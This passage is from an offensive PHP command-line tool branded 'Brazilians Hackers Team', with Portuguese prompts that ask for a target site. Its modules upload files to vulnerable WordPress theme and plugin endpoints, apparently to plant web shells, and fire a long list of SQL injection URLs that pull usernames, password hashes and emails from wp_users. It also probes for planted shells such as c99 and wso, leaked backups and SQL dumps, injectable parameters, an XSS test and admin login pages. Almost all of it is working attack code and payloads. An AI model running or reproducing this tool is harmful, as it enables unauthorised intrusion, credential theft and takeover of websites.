- "/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
- "/wp-content/uploads/rsjp/attachments/",
- "/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php",
- "/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php",
- "/wp-content/plugins/user-meta/framework/helper/uploader.php",
- "/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php",
- "/wp-content/plugins/grapefile/grapeupload.php",
- "/wp-content/plugins/grapefile/grapeupload3.php",
- "/wp-content/plugins/grapefile/grapeupload2.php",
- "/wp-content/plugins/grapefile/grapeupload4.php",
- "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
- "/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html",
- "/wp-admin/includes/heaber.php",
- "/wp-content/plugins/complete-gallery-manager/frames/upload-images.php"
- );
- foreach($wppath as $patwp) {
- $lawp ="$id1wp$patwp";
- $wpnon =get_headers($lawp);
- $wppreg =preg_match("/OK/",$wpnon[0]);
- if($wppreg){
- echo"\nEncontrado ===>$lawp\n ";
- }
- }
- $a1zaz2azaw5a6 = curl_init("$id1wp/wp-content/themes/Bloggie/themify/themify-ajax.php?upload=1");
- curl_setopt($a1zaz2azaw5a6, CURLOPT_POST, true);
- curl_setopt($a1zaz2azaw5a6, CURLOPT_POSTFIELDS,
- array('Filedata'=>"@$uploadfile"));
- curl_setopt($a1zaz2azaw5a6, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($a1zaz2azaw5a6);
- curl_close($a1zaz2azaw5a6);
- $aszjdhozahod=file_get_contents("$id1wp//wp-content/themes/Bloggie/uploads/upload.php");
- if($aszjdhozahod){
- echo"$id1wp/wp-content/themes/Bloggie/uploads/upload.php";
- }
- $a1zaz2azaw5a6sqdqsdqsdqsd = curl_init("$id1wp/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1");
- curl_setopt($a1zaz2azaw5a6sqdqsdqsdqsd, CURLOPT_POST, true);
- curl_setopt($a1zaz2azaw5a6sqdqsdqsdqsd, CURLOPT_POSTFIELDS,
- array('Filedata'=>"@$uploadfile"));
- curl_setopt($a1zaz2azaw5a6sqdqsdqsdqsd, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($a1zaz2azaw5a6sqdqsdqsdqsd);
- curl_close($a1zaz2azaw5a6sqdqsdqsdqsd);
- $ezfze=file_get_contents("$id1wp/wp-content/themes/pinboard/uploads/upload.php");
- if($ezfze){
- echo"$id1wp/wp-content/themes/pinboard/uploads/upload.php";
- }
- $hamzasec = curl_init("$id1wp/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1");
- curl_setopt($hamzasec, CURLOPT_POST, true);
- curl_setopt($hamzasec, CURLOPT_POSTFIELDS,
- array('Filedata'=>"@$uploadfile"));
- curl_setopt($hamzasec, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($hamzasec);
- curl_close($hamzasec);
- $yuyy=@file_get_contents("$id1wp//wp-content/themes/blogfolio/uploads/");
- if($yuyy){
- echo"$id1wp//wp-content/themes/blogfolio/uploads/upload.php";
- }
- ///////////////////////////////////////////////////////////////////
- $lamapazlazmlqclmdpg = curl_init("$id1wp/wp-content/plugins/page-flip-image-gallery/upload.php");
- curl_setopt($lamapazlazmlqclmdpg, CURLOPT_POST, true);
- curl_setopt($lamapazlazmlqclmdpg, CURLOPT_POSTFIELDS,
- array('orange_themes'=>"@$uploadfile")); curl_setopt($lamapazlazmlqclmdpg,
- CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($lamapazlazmlqclmdpg);
- url_close($lamapazlazmlqclmdpg);
- $lalalal=@file_get_contents("$id1wp/wp-content/uploads/upload.php");
- if($lalalal){
- echo"$id1wp/wp-content/uploads/upload.php";
- }
- }
- if($wpid == 2) {
- echo"Entre Com Seu Site http://\n";
- echo"=====>";
- $wpsql =trim(fgets(STDIN,1024));
- echo"Escaneando Por SQL ......\n";
- $sqlwp12=array("index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
- "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*",
- "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23",
- "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*",
- "wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--",
- "wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--",
- "wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users",
- "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users",
- "wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users",
- "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
- "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*",
- "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
- "index?page_id=2&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201",
- "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*",
- "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
- "wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
- "myLDlinker.php?url=-2/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
- "?page_id=2/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2",
- "wp-content/themes/limon/cplphoto.php?postid=-2+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2",
- "?event_id=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
- "wp-content/plugins/photoracer/viewimg.php?id=-99999+union+select+0,1,2,3,4,user(),6,7,8/*",
- "?page_id=2&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users/*",
- "wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*",
- "mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--",
- "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",
- "wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
- "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*");
- foreach($sqlwp12 as $wpsaql12){
- $wppasq="$wpsql/$wpsaql12";
- $wppreg=get_headers($wppasq);
- $nawp=preg_match("/OK/",$wppreg[0]);
- if($nawp){
- echo"\nEncontrado ======>\n $wppasq";
- }
- }
- }
- if($wpid == 3) {
- echo"Entre Com Seu Site http://\n";
- echo"=====>";
- $wpdsl =trim(fgets(STDIN,1024));
- echo"Escaneando Path Disclosure ......\n";
- $wpwpwp=array("/wp-settings.php",
- "/wp-includes/admin-bar.php",
- "/wp-includes/author-template.php",
- "/wp-includes/canonical.php",
- "/wp-includes/category-template.php",
- "/wp-includes/class-wp-embed.php",
- "/wp-includes/media.php",
- "/wp-includes/ms-default-constants.php",
- "/wp-includes/ms-default-filters.php",
- "/wp-includes/ms-settings.php",
- "/wp-includes/post.php",
- "/wp-includes/rss.php",
- "/wp-includes/user.php",
- "/wp-includes/theme.php",
- "/wp-includes/vars.php",
- "/wp-includes/class-wp-http-ixr-client.php",
- "/wp-includes/class-wp-image-editor-gd.php",
- "/wp-includes/class-wp-image-editor-imagick.php",
- "/wp-includes/class-wp-xmlrpc-server.php",
- "/wp-includes/class-wp-xmlrpc-server.php",
- "/wp-includes/class-wp-xmlrpc-server.php",
- "/wp-includes/class.wp-scripts.php",
- "/wp-includes/class.wp-styles.php",
- "/wp-includes/comment-template.php",
- "/wp-includes/default-filters.php",
- "/wp-includes/default-widgets.php",
- "/wp-includes/feed-atom-comments.php",
- "/wp-includes/feed-atom.php",
- "/wp-includes/feed-rdf.php",
- "/wp-includes/feed-rss.php",
- "/wp-includes/feed-rss2-comments.php",
- "/wp-includes/feed-rss2.php",
- "/wp-includes/functions.php");
- foreach($wpwpwp as $dzhacker){
- $allwp="$wpdsl$dzhacker";
- $zebi=get_headers($allwp);
- $nemi=preg_match("/OK/",$zebi[0]);
- if($nemi){
- echo "\n Encontrado ==>\n$allwp";
- }
- }
- }
- if($id == 3 ){
- echo"
- ***********************************************
- ,--^----------,--------,-----,-------^--, *
- | ||||||||| `--------' | O *
- `+---------------------------^----------| *
- `\_,-------, _________________________| *
- / XXXXXX /`| / *
- / XXXXXX / `\ / *
- / XXXXXX /\______( *
- / XXXXXX / *
- / XXXXXX / *
- (________( *
- `------' *
- ***********************************************
- ** **
- ** SQl,Backup,Xss,Upload Path,Shell **
- ** **
- ***********************************************
- Comando http://
- ***********************************************
- Entre Com Seu Site ====>";
- $gnsc =trim(fgets(STDIN,1024));
- $dangpath=array(
- "/wso.php",
- "/c99.php",
- "/upload.php",
- "/upload/upload.php",
- "/uploads/c99.php",
- "/uploads/wso.php",
- "/includes/api/commonwhitelist_2.php",
- "/includes/api/commonwhitelist_5.php",
- "/includes/api/commonwhitelist_6.php",
- "/includes/api/1/album_album.php",
- "/includes/api/1/album_editalbum.php",
- "/includes/api/1/album_latest.php",
- "/includes/api/1/album_overview.php",
- "/includes/api/1/album_picture.php",
- "/includes/api/1/album_user.php",
- "/includes/api/1/announcement_edit.php",
- "/includes/api/1/announcement_view.php",
- "/includes/api/1/api_cmscategorylist.php",
- "/includes/api/1/api_cmssectionlist.php",
- "/includes/api/1/api_forumlist.php",
- "/includes/api/1/api_getnewtop.php",
- "/includes/api/1/api_getsecuritytoken.php",
- "/includes/api/1/api_getsessionhash.php",
- "/includes/api/1/api_init.php",
- "/includes/api/1/api_mobilepublisher.php",
- "/includes/api/1/api_usersearch.php",
- "/includes/api/1/blog_blog.php",
- "/includes/api/1/blog_bloglist.php",
- "/includes/api/1/blog_comments.php",
- "/includes/api/1/blog_custompage.php",
- "/includes/api/1/blog_dosendtofriend.php",
- "/includes/api/1/blog_list.php",
- "/includes/api/1/blog_members.php",
- "/includes/api/1/blog_post_comment.php",
- "/includes/api/1/blog_post_editblog.php",
- "/includes/api/1/blog_post_editcomment.php",
- "/includes/api/1/blog_post_edittrackback.php",
- "/includes/api/1/blog_post_newblog.php",
- "/includes/api/1/blog_post_postcomment.php",
- "/includes/api/1/blog_post_updateblog.php",
- "/includes/api/1/blog_sendtofriend.php",
- "/includes/api/1/blog_subscription_entrylist.php",
- "/includes/api/1/blog_subscription_userlist.php",
- "/includes/api/1/blog_usercp_addcat.php",
- "/includes/api/1/blog_usercp_editcat.php",
- "/includes/api/1/blog_usercp_editoptions.php",
- "/includes/api/1/blog_usercp_editprofile.php",
- "/includes/api/1/blog_usercp_modifycat.php",
- "/includes/api/1/blog_usercp_updateprofile.php",
- "/includes/api/1/editpost_editpost.php",
- "/includes/api/1/editpost_updatepost.php",
- "/includes/api/1/forum.php",
- "/includes/api/1/forumdisplay.php",
- "/includes/api/1/inlinemod_domergeposts.php",
- "/includes/api/1/list.php",
- "/includes/api/1/login_lostpw.php",
- "/includes/api/1/member.php",
- "/includes/api/1/memberlist_search.php",
- "/includes/api/1/misc_showattachments.php",
- "/includes/api/1/misc_whoposted.php",
- "/includes/api/1/newreply_newreply.php",
- "/includes/api/1/newreply_postreply.php",
- "/includes/api/1/newthread_postthread.php",
- "/includes/api/1/newthread_newthread.php",
- "/includes/api/1/poll_newpoll.php",
- "/includes/api/1/poll_polledit.php",
- "/includes/api/1/poll_showresults.php",
- "/includes/api/1/private_editfolders.php",
- "/includes/api/1/private_insertpm.php",
- "/includes/api/1/private_messagelist.php",
- "/includes/api/1/private_newpm.php",
- "/includes/api/1/private_showpm.php",
- "/includes/api/1/private_trackpm.php",
- "/includes/api/1/profile_editattachments.php",
- "/includes/api/1/profile_editoptions.php",
- "/includes/api/1/profile_editprofile.php",
- "/includes/api/1/register_addmember.php",
- "/includes/api/1/register_checkdate.php",
- "/includes/api/1/search_process.php",
- "/includes/api/1/search_showresults.php",
- "/includes/api/1/showthread.php",
- "/includes/api/1/subscription_addsubscription.php",
- "/includes/api/1/subscription_editfolders.php",
- "/includes/api/1/subscription_viewsubscription.php",
- "/includes/api/1/threadtag_managetags.php",
- "/includes/api/2/album_picture.php",
- "/includes/api/2/api_blogcategorylist.php",
- "/includes/api/2/blog_blog.php",
- "/includes/api/2/blog_bloglist.php",
- "/includes/api/2/blog_list.php",
- "/includes/api/2/blog_subscription_entrylist.php",
- "/includes/api/2/blog_subscription_userlist.php",
- "/includes/api/2/blog_usercp_groups.php",
- "/includes/api/2/content.php",
- "/includes/api/2/editpost_editpost.php",
- "/includes/api/2/forumdisplay.php",
- "/includes/api/2/member.php",
- "/includes/api/2/newreply_newreply.php",
- "/includes/api/2/forum.php",
- "/includes/api/2/poll_newpoll.php",
- "/includes/api/2/poll_polledit.php",
- "/includes/api/2/poll_showresults.php",
- "/includes/api/2/private_messagelist.php",
- "/includes/api/2/private_trackpm.php",
- "/includes/api/2/profile_editattachments.php",
- "/includes/api/2/search_showresults.php",
- "/includes/api/2/showthread.php",
- "/includes/api/3/api_gotonewpost.php",
- "/includes/api/4/album_user.php",
- "/includes/api/4/api_forumlist.php",
- "/includes/api/4/api_getnewtop.php",
- "/includes/api/4/breadcrumbs_create.php",
- "/includes/api/4/facebook_getforumid.php",
- "/includes/api/4/facebook_getnewforummembers.php",
- "/includes/api/4/get_vbfromfacebook.php",
- "/includes/api/4/login_facebook.php",
- "/includes/api/4/newreply_postreply.php",
- "/includes/api/4/newthread_postthread.php",
- "/includes/api/4/register.php",
- "/includes/api/4/register_addmember.php",
- "/includes/api/4/search_findusers.php",
- "/includes/api/4/subscription_viewsubscription.php",
- "/includes/api/5/api_init.php",
- "/includes/api/6/api_getnewtop.php",
- "/includes/api/6/api_gotonewpost.php",
- "/includes/api/6/content.php",
- "/includes/api/6/member.php",
- "/includes/api/6/newthread_newthread.php",
- "/includes/block/blogentries.php",
- "/includes/block/cmsarticles.php",
- "/includes/block/html.php",
- "/includes/block/newposts.php",
- "/includes/block/sgdiscussions.php",
- "/includes/block/tagcloud.php",
- "/includes/block/threads.php",
- "/forumrunner/include/subscriptions.php",
- "/forumrunner/include/search_forum.php",
- "/forumrunner/include/profile.php",
- "/forumrunner/include/post.php",
- "/forumrunner/include/pms.php",
- "/forumrunner/include/online.php",
- "/forumrunner/include/moderation.php",
- "/forumrunner/include/misc.php",
- "/forumrunner/include/login.php",
- "/forumrunner/include/get_thread.php",
- "/forumrunner/include/get_forum.php",
- "/forumrunner/include/cms.php",
- "/forumrunner/include/attach.php",
- "/forumrunner/include/announcement.php",
- "/forumrunner/include/album.php",
- "/forumrunner/support/vbulletin_methods.php",
- "/forumrunner/support/stringparser_bbcode.class.php",
- "/forumrunner/support/utils.php",
- "/forumrunner/support/other_methods.php",
- "/packages/skimlinks/hooks/postbit_display_complete.php",
- "/packages/skimlinks/hooks/showthread_complete.php",
- "/packages/skimlinks/hooks/userdata_start.php",
- "/uploads/r57.php",
- "/uploads/0day.php",
- "/images/c99.php",
- "/images/upload.php",
- "/images/wso.php",
- "/images/stories/0day.php",
- "/images/stories/3xp.php",
- "/images/x.php",
- "/images/stories/x.php",
- "/robots.txt",
- "/readme.html",
- "/phpinfo.php",
- "/up.php",
- "/upload.php",
- "/uploads.php",
- "/vb.zip",
- "/vb.rar",
- "/vb.tar",
- "/vb.tar.gz",
- "/site.zip",
- "/site.rar",
- "/site.tar",
- "/site.tar.gz",
- "/home.zip",
- "/home.rar",
- "/home.tar",
- "/home.tar.gz",
- "/forum.zip",
- "/forum.rar",
- "/forum.tar",
- "/forum.tar.gz",
- "/test.txt",
- "/ftp.txt",
- "/user.txt",
- "/site.txt",
- "/error_log",
- "/error",
- "/cpanel",
- "/awstats",
- "/site.sql",
- "/vb.sql",
- "/forum.sql",
- "/backup.sql",
- "/back.sql",
- "/data.sql",
- "/backup.zip",
- "/backup.tar.gz",
- "/backup-wp.zip",
- "/backup-wp.tar.gz",
- "/wp-backup.zip",
- "/wp-backup.tar.gz",
- "/wp-backup.tar",
- "/backup/backup.zip",
- "/backup/backup.tar",
- "/backup/backup.tar.gz",
- "/general.php?*id=",
- "/careers-detail.asp?id=",
- "/WhatNew.asp?page=",
- "/gallery.asp?cid=",
- "/publications.asp?type=",
- "/mpfn?id=",
- "/reservations.php?id=",
- "/list_blogs.php?sort_mode=",
- "/eventdetails.php?*=",
- "/commodities.php?*id=",
- "/recipe-view.php?id=",
- "/product.php?mid=",
- "/view_ad.php?id=",
- "/imprimir.php?id=",
- "/prodotti.php?id=",
- "/index.cgi?aktion=",
- "/default.php?id=",
- "/default.php?portalID=",
- "/news.php?id=",
- "/articles.php?id=",
- "/os_view_full.php?",
- "/Content.asp?id=",
- "/CollectionContent.asp?id=",
- "/Details.asp?id=",
- "/index.php?pgId=",
- "/index.php?PID=",
- "/dosearch.asp?id=",
- "/details.php?linkid=",
- "/viewfaqs.php?cat=",
- "/calendar.php?token=",
- "/games.php?id=",
- "/gmap.php?id=",
- "/index.php?txtCodiInfo=",
- "/notizia.php?idArt=",
- "/read.php?id=",
- "/ViewerFrame?Mode=",
- "/productinfo.php?id=",
- "/collectionitem.php?id=",
- "/band_info.php?id=",
- "/product.php?id=",
- "/releases.php?id=",
- "/ray.php?id=",
- "/produit.php?id=",
- "/pop.php?id=",
- "/shopping.php?id=",
- "/productdetail.php?id=",
- "/post.php?id=",
- "/viewshowdetail.php?id=",
- "/clubpage.php?id=",
- "/memberInfo.php?id=",
- "/section.php?id=",
- "/theme.php?id=",
- "/page.php?id=",
- "/shredder-categories.php?id=",
- "/tradeCategory.php?id=",
- "/product_ranges_view.php?ID=",
- "/shop_category.php?id=",
- "/transcript.php?id=",
- "/channel_id=",
- "/item_id=",
- "/newsid=",
- "/trainers.php?id=",
- "/news-full.php?id=",
- "/news_display.php?getid=",
- "/index2.php?option=",
- "/readnews.php?id=",
- "/top10.php?cat=",
- "/newsone.php?id=",
- "/event.php?id=",
- "/product-item.php?id=",
- "/sql.php?id=",
- "/aboutbook.php?id=",
- "/preview.php?id=",
- "/loadpsb.php?id=",
- "/pages.php?id=",
- "/material.php?id=",
- "/clanek.php4?id=",
- "/announce.php?id=",
- "/chappies.php?id=",
- "/read.php?id=",
- "/viewapp.php?id=",
- "/viewphoto.php?id=",
- "/rub.php?idr=",
- "/galeri_info.php?l=",
- "/review.php?id=",
- "/iniziativa.php?in=",
- "/curriculum.php?id=",
- "/labels.php?id=",
- "/story.php?id=",
- "/look.php?ID=",
- "/newsone.php?id=",
- "/aboutbook.php?id=",
- "/material.php?id=",
- "/opinions.php?id=",
- "/announce.php?id=",
- "/rub.php?idr=",
- "/galeri_info.php?l=",
- "/tekst.php?idt=",
- "/newscat.php?id=",
- "/newsticker_info.php?idn=",
- "/rubrika.php?idr=",
- "/rubp.php?idr=",
- "/offer.php?idf=",
- "/art.php?idm=",
- "/title.php?id=",
- "/trainers.php?id=",
- "/buy.php?category=",
- "/article.php?ID=",
- "/play_old.php?id=",
- "/declaration_more.php?decl_id=",
- "/Pageid=",
- "/games.php?id=",
- "/page.php?file=",
- "/newsDetail.php?id=",
- "/gallery.php?id=",
- "/article.php?id=",
- "/show.php?id=",
- "/staff_id=",
- "/newsitem.php?num=",
- "/readnews.php?id=",
- "/top10.php?cat=",
- "/historialeer.php?num=",
- "/reagir.php?num=",
- "/forum_bds.php?num=",
- "/game.php?id=",
- "/view_product.php?id=",
- "/newsone.php?id=",
- "/sw_comment.php?id=",
- "/news.php?id=",
- "/avd_start.php?avd=",
- "/event.php?id=",
- "/product-item.php?id=",
- "/sql.php?id=",
- "/news_view.php?id=",
- "/select_biblio.php?id=",
- "/humor.php?id=",
- "/aboutbook.php?id=",
- "/fiche_spectacle.php?id=",
- "/communique_detail.php?id=",
- "/sem.php3?id=",
- "/kategorie.php4?id=",
- "/news.php?id=",
- "/index.php?id=",
- "/faq2.php?id=",
- "/show_an.php?id=",
- "/preview.php?id=",
- "/loadpsb.php?id=",
- "/opinions.php?id=",
- "/spr.php?id=",
- "/pages.php?id=",
- "/announce.php?id=",
- "/clanek.php4?id=",
- "/participant.php?id=",
- "/download.php?id=",
- "/main.php?id=",
- "/review.php?id=",
- "/chappies.php?id=",
- "/read.php?id=",
- "/prod_detail.php?id=",
- "/viewphoto.php?id=",
- "/article.php?id=",
- "/person.php?id=",
- "/productinfo.php?id=",
- "/showimg.php?id=",
- "/view.php?id=",
- "/website.php?id=",
- "/hosting_info.php?id=",
- "/gallery.php?id=",
- "/rub.php?idr=",
- "/view_faq.php?id=",
- "/artikelinfo.php?id=",
- "/detail.php?ID=",
- "/index.php?=",
- "/profile_view.php?id=",
- "/category.php?id=",
- "/publications.php?id=",
- "/fellows.php?id=",
- "/downloads_info.php?id=",
- "/prod_info.php?id=",
- "/shop.php?do=,part&id=",
- "/Productinfo.php?id=",
- "/collectionitem.php?id=",
- "/band_info.php?id=",
- "/product.php?id=",
- "/releases.php?id=",
- "/ray.php?id=",
- "/produit.php?id=",
- "/pop.php?id=",
- "/shopping.php?id=",
- "/productdetail.php?id=",
- "/post.php?id=",
- "/viewshowdetail.php?id=",
- "/clubpage.php?id=",
- "/memberInfo.php?id=",
- "/section.php?id=",
- "/theme.php?id=",
- "/page.php?id=",
- "/shredder-categories.php?id=",
- "/tradeCategory.php?id=",
- "/product_ranges_view.php?ID=",
- "/shop_category.php?id=",
- "/transcript.php?id=",
- "/channel_id=",
- "/item_id=",
- "/newsid=",
- "/trainers.php?id=",
- "/news-full.php?id=",
- "/news_display.php?getid=",
- "/index2.php?option=",
- "/readnews.php?id=",
- "/top10.php?cat=",
- "/newsone.php?id=",
- "/event.php?id=",
- "/product-item.php?id=",
- "/sql.php?id=",
- "/aboutbook.php?id=",
- "/review.php?id=",
- "/loadpsb.php?id=",
- "/ages.php?id=",
- "/material.php?id=",
- "/clanek.php4?id=",
- "/announce.php?id=",
- "/chappies.php?id=",
- "/read.php?id=",
- "/viewapp.php?id=",
- "/viewphoto.php?id=",
- "/rub.php?idr=",
- "/galeri_info.php?l=",
- "/review.php?id=",
- "/iniziativa.php?in=",
- "/curriculum.php?id=",
- "/labels.php?id=",
- "/look.php?ID=",
- "/newsone.php?id=",
- "/aboutbook.php?id=",
- "/material.php?id=",
- "/opinions.php?id=",
- "/announce.php?id=",
- "/rub.php?idr=",
- "/galeri_info.php?l=",
- "/tekst.php?idt=",
- "/newscat.php?id=",
- "/newsticker_info.php?idn=",
- "/rubrika.php?idr=",
- "/rubp.php?idr=",
- "/offer.php?idf=",
- "/art.php?idm=",
- "/title.php?id=",
- "/db.php?path_local=",
- "/principal.php?conteudo=",
- "/main.php?site=",
- "/template.php?pagina=",
- "/contenido.php?sec=",
- "/index_principal.php?pagina=",
- "/template.php?name=",
- "/forum.php?act=",
- "/home.php?action=",
- "/home.php?pagina=",
- "/noticias.php?arq=",
- "/main.php?x=",
- "/main.php?page=",
- "/default.php?page=",
- "/search.php?id=1<script>alert(21)</script>");
- foreach($dangpath as $papa){
- $houwari="$gnsc/$papa";
- $fati=get_headers($houwari);
- $lambilonce=preg_match("/404/",$fati[0]);
- if(!$lambilonce){
- echo "Encontrado \n";
- echo"$houwari\n";
- }
- }
- }
- /////////////////////////////////////////////////////////////////////////////////////////////////////////
- if($id == 4){
- echo "
- +#############################+
- # #
- # *** Brazilians Hackers Team #
- # #
- +#############################+
- *******************************
- ******ADMIN PAINEL FINDER******
- *******************************
- Comando http://
- *******************************\n\n";
- echo"Entre Com Seu Site ===>";
- $adminpanel=trim(fgets(STDIN,1024));
- $nhy=array(
- "admin.asp",
- "login.asp",
- "admin/account.asp",
- "admin/login.asp",
- "admin/login.asp",
- "admin/home.asp",
- "admin/controlpanel.asp",
- "admin/cp.asp",
- "admin/adminLogin.asp",
- "admin/admin_login.asp",
- "admin/controlpanel.asp",
- "admin/admin-login.asp",
- "admin-login.asp",
- "admin/account.asp",
- "admin/admin.asp",
- "admin.asp",
- "adminitem.asp",
- "adminitems.asp",
- "administrator/login.asp",
- "administrator.asp",
- "administration.asp",
- "adminLogin/",
- "adminlogin.asp",
- "admin_area/admin.asp",
- "admin_area/login.asp",
- "manager.asp",
- "letmein.asp",
- "admin.php",
- "login.php",
- "login.php",
- "login/",
- "login.php",
- "adm/",
- "admin/",
- "admin/account.php",
- "admin/login.php",
- "admin/login.php",
- "admin/home.php",
- "admin/controlpanel.php",
- "admin/controlpanel.php",
- "admin/cp.php",
- "admin/adminLogin.php",
- "admin/adminLogin.php",
- "admin/admin_login.php",
- "admin/controlpanel.php",
- "admin/admin-login.php",
- "admin-login.php",
- "admin/account.php",
- "admin/admin.php",
- "admin.php",
- "admin.php",
- "adminitem/",
- "adminitem.php",
- "adminitems/",
- "adminitems.php",
- "administrator/",
- "administrator/",
- "administrator.php",
- "administration/",
- "administration.php",
- "adminLogin/",
- "adminlogin.php",
- "admin_area/admin.php",
- "admin_area/",
- "admin_area/login.php",
- "manager/",
- "manager.php",
- "letmein/",
- "letmein.php",
- "superuser/",
- "superuser.php",
- "access/",
- "access.php",
- "sysadm/",
- "sysadm.php",
- "superman/",
- "supervisor/",
- "panel.php",
- "control/",
- "control.php",
- "member/",
- "member.php",
- "members/",
- "members.php",
- "user/",
- "user.php",
- "cp/",
- "uvpanel/",
- "manage/",
- "manage.php",
- "management/",
- "management.php",
- "signin/",
- "signin.php",
- "log-in/",
- "log-in.php",
- "log_in/",
- "log_in.php",
- "sign_in/",
- "sign_in.php",
- "sign-in/",
- "sign-in.php",
- "users/",
- "users.php",
- "accounts/",
- "accounts.php",
- "wp-login.php",
- "bb-admin/login.php",
- "bb-admin/admin.php",
- "bb-admin/admin.php",
- "administrator/account.php",
- "relogin.php",
- "relogin.php",
- "check.php",
- "relogin.php",
- "blog/wp-login.php",
- "user/admin.php",
- "users/admin.php",
- "registration/",
- "processlogin.php",
- "checklogin.php",
- "checkuser.php",
- "checkadmin.php",
- "isadmin.php",
- "authenticate.php",
- "authentication.php",
- "auth.php",
- "authuser.php",
- "authadmin.php",
- "cp.php",
- "modelsearch/",
- "moderator.php",
- "moderator/",
- "controlpanel/",
- "controlpanel.php",
- "admincontrol.php",
- "adminpanel.php",
- "fileadmin/",
- "fileadmin.php",
- "sysadmin.php",
- "admin1.php",
- "admin1.php" ,
- "admin1.php",
- "admin2.php",
- "admin2.php",
- "yonetim.php",
- "yonetim.php",
- "yonetici.php",
- "yonetici.php",
- "phpmyadmin/",
- "myadmin/",
- "ur-admin.php",
- "ur-admin/",
- "Server.php",
- "Server/",
- "wp-admin/",
- "administr8.php",
- "administr8/",
- "webadmin/",
- "webadmin.php",
- "administratie/",
- "admins/",
- "admins.php",
- "administrivia/",
- "Database_Administration/",
- "useradmin/",
- "sysadmins/",
- "admin1/",
- "system-administration/",
- "administrators/",
- "pgadmin/",
- "directadmin/",
- "staradmin/",
- "ServerAdministrator/",
- "SysAdmin/",
- "administer/",
- "LiveUser_Admin/",
- "sys-admin/",
- "typo3/",
- "panel/",
- "cpanel/",
- "cpanel_file/",
- "platz_login/",
- "rcLogin/",
- "blogindex/",
- "formslogin/",
- "autologin/",
- "support_login/",
- "meta_login/",
- "manuallogin/",
- "simpleLogin/",
- "loginflat/",
- "utility_login/",
- "showlogin/",
- "memlogin/",
- "login-redirect/",
- "sub-login/",
- "wp-login/",
- "login1/",
- "dir-login/",
- "login_db/",
- "xlogin/",
- "smblogin/",
- "customer_login/",
- "UserLogin/",
- "login-us/",
- "acct_login/",
- "bigadmin/",
- "project-admins/",
- "phppgadmin/",
- "pureadmin/",
